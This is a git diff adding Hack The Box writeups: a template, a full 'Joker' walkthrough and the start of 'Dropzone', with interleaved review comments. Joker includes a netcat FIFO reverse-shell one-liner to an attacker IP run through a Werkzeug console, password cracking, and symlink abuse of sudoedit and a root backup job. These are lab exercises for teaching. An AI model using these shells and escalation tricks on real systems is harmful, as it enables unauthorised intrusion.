Binary files /dev/null and b/Easy/prg/9_008.png differ
diff --git a/Easy/prg/9_009.png b/Easy/prg/9_009.png
new file mode 100644
index 0000000..54a70da
Binary files /dev/null and b/Easy/prg/9_009.png differ
diff --git a/Hard/0.md b/Hard/0.md
new file mode 100644
index 0000000..f13ef24
--- /dev/null
+++ b/Hard/0.md
@@ -0,0 +1,66 @@
+# Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
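Review bot: the discovery scan in Part 1 of this template, `sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered`, can silently miss open ports because `--max-retries 0` never resends a dropped probe; either drop that flag or say in the paragraph that this is a quick first pass whose result is confirmed by the targeted `-sCV` scan that follows. In the same paragraph "-sU to for udp ports" should read "-sU for udp ports". The Conclusion section ends on "Here we can see the progress graph :" with nothing after it; add the image reference or remove the line from the template, and the "the text goes here" placeholders in the Introduction and Parts 2-3 would be safer as explicit `TODO` markers so an unfilled copy is not published as a finished writeup.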
diff --git a/Hard/1.md b/Hard/1.md
new file mode 100644
index 0000000..3ed7e0f
--- /dev/null
+++ b/Hard/1.md
@@ -0,0 +1,462 @@
+# Joker Writeup
+
+
+
+## Introduction :
+
+Joker is a hard linux box released back in May 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.21 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.21
+ Discovered open port 3128/tcp on 10.10.10.21
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/10 ] [~]
+ → nmap -sCV 10.10.10.21 -Pn -p 22,3128
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 17:39 CEST
+ Nmap scan report for 10.10.10.21
+ Host is up (0.032s latency).
+ Not shown: 998 filtered ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
+ | 256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
+ |_ 256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (ED25519)
+ 3128/tcp open http-proxy Squid http proxy 3.5.12
+ |_http-server-header: squid/3.5.12
+ |_http-title: ERROR: The requested URL could not be retrieved
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 21.78 seconds
+
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/11 ] [~]
+ → sudo nmap -sU 10.10.10.21 -p 69,5355
+ [sudo] password for nothing:
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 17:53 CEST
+ Nmap scan report for 10.10.10.21
+ Host is up (0.028s latency).
+
+ PORT STATE SERVICE
+ 69/udp open|filtered tftp
+ 5355/udp open|filtered llmnr
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.62 second
+
+
+## **Part 2 : Getting User Access**
+
+The UDP scan picked up port 69 tftp so let's investigate it:
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/11 ] [~/_HTB/Joker]
+ → sudo pacman -S tftp-hpa
+ resolving dependencies...
+ looking for conflicting packages...
+
+ Packages (1) tftp-hpa-5.2-9
+
+ Total Download Size: 0,04 MiB
+ Total Installed Size: 0,09 MiB
+
+ :: Proceed with installation? [Y/n] y
+ :: Retrieving packages...
+ tftp-hpa-5.2-9-x86_64 37,8 KiB 1260 KiB/s 00:00 [###################################] 100%
+ (1/1) checking keys in keyring [###################################] 100%
+ (1/1) checking package integrity [###################################] 100%
+ (1/1) loading package files [###################################] 100%
+ (1/1) checking for file conflicts [###################################] 100%
+ (1/1) checking available disk space [###################################] 100%
+ :: Processing package changes...
+ (1/1) installing tftp-hpa [###################################] 100%
+ :: Running post-transaction hooks...
+ (1/2) Reloading system manager configuration...
+ (2/2) Arming ConditionNeedsUpdate...
+
+ [ 10.10.14.37/23 ] [ /dev/pts/11 ] [~/_HTB/Joker]
+ → tftp 10.10.10.21
+ tftp> get passwords
+ Recieved 48 bytes in 5.9 seconds
+
+
+Once we have the passwords file we will use john to crack it using the rockyou.txt wordlist:
+
+
+ john --wordlist=/usr/share/wordlists/rockyou.txt passwords
+
+
+Once it's done we have the credentials we need : ihateseafood (kalamari) so now let's make use of port 3128 (squid proxy) using firefox
+
+ 
+
+So that's one way of doing it, but we can also use foxyproxy to do that:
+
+
+
+Once that's done, visiting http://127.0.0.1 redirects us to a login prompt (where we put in the credentials john found earlier) and we are greeted by a shorty-url webpage. So we enumerate it using dirb
+
+
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/14 ] [~]
+ → dirb http://127.0.0.1 -p 10.10.10.21:3128 -P kalamari:ihateseafood -r
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Wed Jul 29 18:19:04 2020
+ URL_BASE: http://127.0.0.1/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+ PROXY: 10.10.10.21:3128
+ PROXY AUTHORIZATION: kalamari:ihateseafood
+ OPTION: Not Recursive
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://127.0.0.1/ ----
+ + http://127.0.0.1/console (CODE:200|SIZE:1479)
+
+
+now we visit http://127.0.0.1/console and we are greeted by a python interpreter into which we're going to inject our reverse shell. but before that we need to enumerate a bit:
+
+
+ >>> import os
+ >>> os.popen("whoami").read()
+ 'werkzeug\n'
+ >>> os.popen("nc -h").read()
+ ''
+ >>> os.popen("nc -h 2>&1").read()
+ 'OpenBSD netcat (Debian patchlevel 1.105-7ubuntu1)\nThis is nc from the netcat-openbsd package. An alternative nc is available\nin the netcat-traditional package.\nusage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]\n\t [-P proxy_username] [-p source_port] [-q seconds] [-s source]\n\t [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]\n\t [-x proxy_address[:port]] [destination] [port]\n\tCommand Summary:\n\t\t-4\t\tUse IPv4\n\t\t-6\t\tUse IPv6\n\t\t-b\t\tAllow broadcast\n\t\t-C\t\tSend CRLF as line-ending\n\t\t-D\t\tEnable the debug socket option\n\t\t-d\t\tDetach from stdin\n\t\t-h\t\tThis help text\n\t\t-I length\tTCP receive buffer length\n\t\t-i secs\t\tDelay interval for lines sent, ports scanned\n\t\t-j\t\tUse jumbo frame\n\t\t-k\t\tKeep inbound sockets open for multiple connects\n\t\t-l\t\tListen mode, for inbound connects\n\t\t-n\t\tSuppress name/port resolutions\n\t\t-O length\tTCP send buffer length\n\t\t-P proxyuser\tUsername for proxy authentication\n\t\t-p port\t\tSpecify local port for remote connects\n \t-q secs\t\tquit after EOF on stdin and delay of secs\n\t\t-r\t\tRandomize remote ports\n\t\t-S\t\tEnable the TCP MD5 signature option\n\t\t-s addr\t\tLocal source address\n\t\t-T toskeyword\tSet IP Type of Service\n\t\t-t\t\tAnswer TELNET negotiation\n\t\t-U\t\tUse UNIX domain socket\n\t\t-u\t\tUDP mode\n\t\t-V rtable\tSpecify alternate routing table\n\t\t-v\t\tVerbose\n\t\t-w secs\t\tTimeout for connects and final net reads\n\t\t-X proto\tProxy protocol: "4", "5" (SOCKS) or "connect"\n\t\t-x addr[:port]\tSpecify proxy address and port\n\t\t-Z\t\tDCCP mode\n\t\t-z\t\tZero-I/O mode [used for scanning]\n\tPort numbers can be individual or ranges: lo-hi [inclusive]\n'
+ >>>
+
+
+so here we see that netcat is here, and the flags we have here are **-46bCDdhjklnrStUuvZz** it is important to note that we do not have the -e flag so it's here that many other people who made the writeup of this box falsely claimed they could just use pentestmonkey's python reverse shell one liner because it contains the -e flag which is not here for netcat. So to go around this we'll use another reverse shell one liner :
+
+
+ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f
+
+
+Here it is important to add the & at the end because if this is not successful, the webservice will die on us and we would need to revert the box. This makes sure that the process runs in the background on another thread in order for us to keep using the box in case if it doesn't work.
+
+
+ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f &
+
+
+Now here we are dealing with a python interpreter so we need to wrap our payload within the os.popopen("").read() command:
+
+
+ import os
+ os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f &").read()
+
+
+Sadly this doesn't work, and that is because there are iptables. We can see that here:
+
+
+ >>> os.popen("find /etc | grep iptables").read()
+ '/etc/iptables\n/etc/iptables/rules.v4\n/etc/iptables/rules.v6\n'
+ >>> os.popen("base64 -w 0 /etc/iptables/rules.v4").read()
+ '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'
+ >>>
+
+
+then we decode it locally :
+
+
+ echo 'B64STRING' | base64 -d > iptables.v4
+
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/8 ] [~/_HTB/Joker]
+ → echo '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' | base64 -d > iptables.v4
+
+ [ 10.10.14.37/23 ] [ /dev/pts/8 ] [~/_HTB/Joker]
+ → nano iptables.v4
+
+
+
+ # Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
+ *filter
+ :INPUT DROP [41573:1829596]
+ :FORWARD ACCEPT [0:0]
+ :OUTPUT ACCEPT [878:221932]
+ -A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
+ -A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
+ -A INPUT -i ens33 -p udp -j ACCEPT
+ -A INPUT -i ens33 -p icmp -j ACCEPT
+ -A INPUT -i lo -j ACCEPT
+ -A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
+ COMMIT
+ # Completed on Fri May 19 18:01:16 2017
+
+
+And here we see the problem, because we can only use a few ports for tcp (22 and 3128) , and the box accepts icmp (ping requests) as well as udp. So the easiest way to do it from here, is to spawn a reverse shell on a udp port instead of tcp.
+
+
+ import os
+ os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.14.13 9002 >/tmp/f &").read()
+
+
+and of course, to recieve the reverse shell, we also need the -u flag on our end to make sure it is on our udp port:
+
+
+ nc -u -lvnp 9002
+
+
+` 
+
+Now that we got our reverse shell, we are logged in as the user "werkzeug", we will first of all upgrade our reverse shell to a fully interactive shell:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Joker]
+ → nc -u -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.8] from (UNKNOWN) [10.10.10.21] 48079
+ /bin/sh: 0: can't access tty; job control turned off
+ $ which bash
+ /bin/bash
+ $ which bash sh curl wget python python3
+ /bin/bash
+ /bin/sh
+ /usr/bin/curl
+ /usr/bin/wget
+ /usr/bin/python
+ /usr/bin/python3
+ $ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ werkzeug@joker:~$ ^Z
+ [1] + 18172 suspended nc -u -lvnp 9002
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Joker]
+ → stty raw -echo ; fg
+ [1] + 18172 continued nc -u -lvnp 9002
+ export TERM=screen-256color
+ werkzeug@joker:~$ export SHELL=bash
+ werkzeug@joker:~$ stty rows 50 columns 200
+ werkzeug@joker:~$ reset
+
+
+
+This reverse shell is very glitchy due to the use of the UDP protocol so make sure to press enter in between each previous step to make sure you get output.
+
+Now we could run a privesc script to find the vulnerabilities for us, but it is a fairly simple one, we just type sudo -l
+
+
+
+and here we see what this box is about, the user we are logged in as (werkzeug) may run the sudoedit command on joker as the user alekos on /var/www/*/*/layout.html
+
+if we run dpkg -l sudo :
+
+
+
+We see that sudo is version 1.8.16.0 and if we run a searchsploit command on this, we see that there is an exploit for it (namely 11651.sh and 37710.txt)
+
+So the idea here is, that you can take advantage of this wildcard vulnerability in sudo using symlinks and therefore being able to edit files that you are not supposed to be able to edit. Namely the authorized_key file in root's .ssh directory to put our public key in:
+
+
+ [terminal 1]
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Joker]
+ → cat ~/.ssh/mahakaliVM.pub
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMOJqQ6+ycZGjPXSNkZ3zvgaHhEyLGcFb7fPfEIZSQl8 nothing@mahakali
+
+
+ [terminal 2]
+ werkzeug@joker:~/testing/nihilist$ ln -s /home/alekos/.ssh/authorized_keys layout.html
+ werkzeug@joker:~/testing/nihilist$ ls -lash
+ total 8.0K
+ 4.0K drwxrwxr-x 2 werkzeug werkzeug 4.0K Jul 6 22:31 .
+ 4.0K drwxr-xr-x 3 werkzeug werkzeug 4.0K Jul 6 22:30 ..
+ 0 lrwxrwxrwx 1 werkzeug werkzeug 33 Jul 6 22:31 layout.html -> /home/alekos/.ssh/authorized_keys
+
+ werkzeug@joker:~/testing/nihilist$ sudoedit -u alekos /var/www/testin/nihilistlayout.html
+
+ Unable to create directory /var/www/.nano: Permission denied
+ It is required for saving/loading search history or cursor positions.
+
+ Press Enter to continue
+
+ werkzeug@joker:~/testing/nihilist$cat layout.html
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMOJqQ6+ycZGjPXSNkZ3zvgaHhEyLGcFb7fPfEIZSQl8 nothing@mahakali
+
+
+
+Now that our public key is in alekos's authorized_keys file, let's ssh as alekos:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Joker]
+ → ssh alekos@10.10.10.21 -i ~/.ssh/mahakaliVM
+ The authenticity of host '10.10.10.21 (10.10.10.21)' can't be established.
+ ECDSA key fingerprint is SHA256:1yj4blzJwO5TYIZYFB3HMwXEqeflHc2iF1Idp3lZ94k.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.21' (ECDSA) to the list of known hosts.
+ Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-52-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Sat May 20 16:38:08 2017 from 10.10.13.210
+ alekos@joker:~$ id
+ uid=1001(alekos) gid=1001(alekos) groups=1001(alekos),1000(werkzeug)
+ alekos@joker:~$ ls -l
+ total 20
+ drwxrwx--- 2 root alekos 12288 Jul 6 22:40 backup
+ drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
+ -r--r----- 1 root alekos 33 May 19 2017 user.txt
+ alekos@joker:~$ cat user.txt
+ a2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you go! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to root on this box we're going to take a look at alekos's files:
+
+
+ alekos@joker:~$ ls -lash backup/
+ total 336K
+ 12K drwxrwx--- 2 root alekos 12K Jul 6 22:45 .
+ 4.0K drwxr-xr-x 7 alekos alekos 4.0K May 19 2017 ..
+ 40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134201.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134501.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:20 dev-1625599201.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:25 dev-1625599501.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:30 dev-1625599801.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:35 dev-1625600101.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:40 dev-1625600401.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:45 dev-1625600701.tar.gz
+
+
+here we see that a backup is being made every 5 minutes by the root user. So let's extract one of these backups to see what it does:
+
+
+ alekos@joker:~/backup$ mkdir extract
+ alekos@joker:~/backup$ cd extract
+ alekos@joker:~/backup/extract$ cp ../dev-1625601001.tar.gz .
+ alekos@joker:~/backup/extract$ gunzip -d dev-1625601001.tar.gz
+
+ gzip: dev-1625601001.tar.gz: not in gzip format
+ alekos@joker:~/backup/extract$ ls -l
+ total 40
+ -rw-r----- 1 alekos alekos 40960 Jul 6 22:50 dev-1625601001.tar.gz
+ alekos@joker:~/backup/extract$ file dev-1625601001.tar.gz
+ dev-1625601001.tar.gz: POSIX tar archive (GNU)
+ alekos@joker:~/backup/extract$ tar -xvf dev-1625601001.tar.gz
+ __init__.py
+ application.py
+ data/
+ data/shorty.db
+ models.py
+ static/
+ static/style.css
+ templates/
+ templates/layout.html
+ templates/not_found.html
+ templates/list.html
+ templates/display.html
+ templates/new.html
+ utils.py
+ views.py
+ alekos@joker:~/backup/extract$ ls -lash ../../development/
+ total 36K
+ 4.0K drwxr-x--- 5 alekos alekos 4.0K May 18 2017 .
+ 4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:50 ..
+ 4.0K -rw-r----- 1 alekos alekos 1.5K May 18 2017 application.py
+ 4.0K drwxrwx--- 2 alekos alekos 4.0K May 18 2017 data
+ 0 -rw-r----- 1 alekos alekos 0 May 18 2017 __init__.py
+ 4.0K -rw-r----- 1 alekos alekos 997 May 18 2017 models.py
+ 4.0K drwxr-x--- 2 alekos alekos 4.0K May 18 2017 static
+ 4.0K drwxr-x--- 2 alekos alekos 4.0K May 18 2017 templates
+ 4.0K -rw-r----- 1 alekos alekos 2.5K May 18 2017 utils.py
+ 4.0K -rw-r----- 1 alekos alekos 1.8K May 18 2017 views.py
+ alekos@joker:~/backup/extract$
+
+
+And here we see that basically there is a backup of the development folder that's being made every 5 minutes. So we basically make a symbolic link to /root/ so that the next backup that's being made is going to be that of the **/root/** directory where the root flag is.
+
+
+ alekos@joker:~$ date
+ Tue Jul 6 22:53:48 EEST 2021
+ alekos@joker:~$ ls -l
+ total 20
+ drwxrwx--- 3 root alekos 12288 Jul 6 22:50 backup
+ drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
+ -r--r----- 1 root alekos 33 May 19 2017 user.txt
+ alekos@joker:~$ mv development/ dev.bak
+ alekos@joker:~$ ln -s /root/ development
+ alekos@joker:~$ ls -lash
+ total 52K
+ 4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:54 .
+ 4.0K drwxr-xr-x 3 root root 4.0K May 16 2017 ..
+ 12K drwxrwx--- 3 root alekos 12K Jul 6 22:50 backup
+ 0 -rw------- 1 root root 0 May 17 2017 .bash_history
+ 4.0K -rw-r--r-- 1 alekos alekos 220 May 16 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 alekos alekos 3.7K May 16 2017 .bashrc
+ 4.0K drwx------ 2 alekos alekos 4.0K May 17 2017 .cache
+ 4.0K drwxr-x--- 5 alekos alekos 4.0K May 18 2017 dev.bak
+ 0 lrwxrwxrwx 1 alekos alekos 6 Jul 6 22:54 development -> /root/
+ 4.0K drwxr-xr-x 2 alekos alekos 4.0K May 17 2017 .nano
+ 4.0K -rw-r--r-- 1 alekos alekos 655 May 16 2017 .profile
+ 4.0K drwxr-xr-x 2 alekos alekos 4.0K May 20 2017 .ssh
+ 4.0K -r--r----- 1 root alekos 33 May 19 2017 user.txt
+ alekos@joker:~$ date
+ Tue Jul 6 22:54:13 EEST 2021
+
+
+We wait for the next backup to happen, and then we extract it:
+
+
+ alekos@joker:~$ date
+ Tue Jul 6 22:55:19 EEST 2021
+ alekos@joker:~$ cd backup/
+ alekos@joker:~/backup$ ls -lash
+ total 392K
+ 12K drwxrwx--- 3 root alekos 12K Jul 6 22:55 .
+ 4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:54 ..
+ 40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134201.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134501.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:20 dev-1625599201.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:25 dev-1625599501.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:30 dev-1625599801.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:35 dev-1625600101.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:40 dev-1625600401.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:45 dev-1625600701.tar.gz
+ 40K -rw-r----- 1 root alekos 40K Jul 6 22:50 dev-1625601001.tar.gz
+ 12K -rw-r----- 1 root alekos 10K Jul 6 22:55 dev-1625601301.tar.gz
+ 4.0K drwxrwxr-x 5 alekos alekos 4.0K Jul 6 22:51 extract
+ alekos@joker:~/backup$ tar -xvf dev-1625601301.tar.gz
+ backup.sh
+ root.txt
+ alekos@joker:~/backup$ cat root.txt
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We got the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
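Review bot: the escalation step around `+And here we see that basically there is a backup of the development folder` never names the actual weakness, and the conclusion at `+Here we can see the progress graph :` is followed by no graph. The listings already show everything needed: `development -> /root/` after the `ln -s`, and the next archive `dev-1625601301.tar.gz` (10K instead of 40K) contains `backup.sh` and `root.txt`, so the root-owned five-minute job archives a path inside a user-writable home directory and follows whatever that path currently points to. One sentence saying that (a root process trusting a user-controlled path) is what a reader needs in order to fix the same bug elsewhere, and since `backup.sh` was extracted right there, quoting the line that builds the archive would document why the symlink is followed instead of leaving it to guesswork. Two smaller points: `gunzip -d` fails with `not in gzip format` and `file` reports a plain `POSIX tar archive (GNU)`, so the `.tar.gz` suffix is misleading and deserves a remark rather than a silent switch to `tar -xvf`; and the paragraph starts with a lowercase `here`, uses `basically` twice in two sentences, and should read as finished prose. Either add the missing progress graph image or drop the sentence that refers to it.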
diff --git a/Hard/10.md b/Hard/10.md
new file mode 100644
index 0000000..995507b
--- /dev/null
+++ b/Hard/10.md
@@ -0,0 +1,683 @@
+# Dropzone Writeup
+
+
+
+## Introduction :
+
+Dropzone is a hard windows box released back in May 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.90 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 69/udp on 10.10.10.90
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~]
+ → sudo nmap -sU -p69 -sCV -Pn 10.10.10.90
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 09:45 CET
+ Nmap scan report for 10.10.10.90
+ Host is up (0.033s latency).
+
+ PORT STATE SERVICE VERSION
+ 69/udp open tftp SolarWinds Free tftpd
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+So we know that we have tftp port opened, now let's enumerate it:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
+ → tftp 10.10.10.90
+ tftp> get /windows
+ Error code 1: Access to the path 'C:\windows' is denied.
+ tftp> get /%USERNAME%
+ Error code 1: Could not find file 'C:\%USERNAME%'.
+ tftp> get /windows/system32/config/SAM
+ Error code 1: The process cannot access the file 'C:\windows\system32\config\SAM' because it is being used by another process.
+ tftp> get /Documents and Settings
+ tftp: Documents: Is a directory
+ Error code 1: Could not find file 'C:\and'.
+ Error code 1: Could not find file 'C:\Settings'.
+ tftp>
+
+ tftp> get 'Documents and Settings'
+ Error code 1: Could not find file 'C:\'Documents'.
+ Error code 1: Could not find file 'C:\and'.
+ Error code 1: Could not find file 'C:\Settings''.
+ tftp> get "Documents and Settings"
+ Error code 0: Bailing out to bad characters in filename: '"Documents'.
+ Error code 1: Could not find file 'C:\and'.
+ Error code 0: Bailing out to bad characters in filename: 'Settings"'.
+ tftp>
+
+
+
+
+Here we see a few things, first of all this is a windows machine because the first error tells us that the path C:\Windows exists but it's access is denied. Second of all, it looks like we cannot access the Documents and settings folder even when we wrap it in '' or "". This is because on older windows machines, there could not be long filenames, therefore the folder names would be 6 characters long and the number of whatever folder would match these first 8 letters like so:
+
+
+ tftp> get Docume~1
+ Error code 1: Access to the path 'C:\Documents and Settings' is denied.
+ tftp> get Docume~1/Admini~1
+ Error code 1: Access to the path 'C:\Documents and Settings\Administrator' is denied.
+ tftp>
+
+
+
+As you can see, we write the first 6 characters and then ~1 to find the first folder that matches these first 6 characters, and we found the directories we wanted. now let's check if this is a 32bit or a 64bit machine by checking if the Program Files x86 folder exists (which would mean that the Program Files folder is the 64bit folder):
+
+
+ tftp> get /Progra~1
+ Error code 1: Access to the path 'C:\Program Files' is denied.
+ tftp> get /Progra~2
+ Error code 1: Could not find file 'C:\Progra~2'.
+ tftp>
+
+
+
+And here we can see that there is only the Program Files folder, therefore it is safe to assume that this is a 32bit windows machine, and most probably windows XP. From here, we're going to use metasploit's psexec module:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
+ → locate psexec | grep metasploit
+ /usr/share/doc/metasploit-framework/modules/exploit/windows/smb/ms17_010_psexec.md
+ /usr/share/doc/metasploit-framework/modules/exploit/windows/smb/psexec.md
+ /usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb
+ /usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb
+ /usr/share/metasploit-framework/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
+ /usr/share/metasploit-framework/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb
+ /usr/share/metasploit-framework/modules/exploits/windows/local/current_user_psexec.rb
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb
+ /usr/share/metasploit-framework/tools/exploit/psexec.rb
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
+ → cp /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
+ → vim psexec.rb
+
+
+
+And let's inspect what it does:
+
+
+
+Here we're going to check the powershell part because older windows machines didn't have powershell, which is why most people stepped into a rabbithole by not inspecting what the exploit did exactly, so we're going to check what that execute_powershell_payload function does by looking at where it is actually defined:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
+ → locate psexec | grep metasploit | xargs grep execute_powershell
+ **/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb: def execute_powershell_payload**
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb: execute_powershell_payload
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb: execute_powershell_payload
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb: execute_powershell_payload
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb: execute_powershell_payload
+
+
+
+So here we see the function is defined in the first result:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
+ → cp /usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
+ → nano psexec.rb
+
+
+
+And here it is, so first of all this function executes cmd_psh_payload() which takes in 2 arguements, payload.encoded and the architecture (x86 or x64):
+
+
+ def execute_powershell_payload
+ ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
+ command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+
+ if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
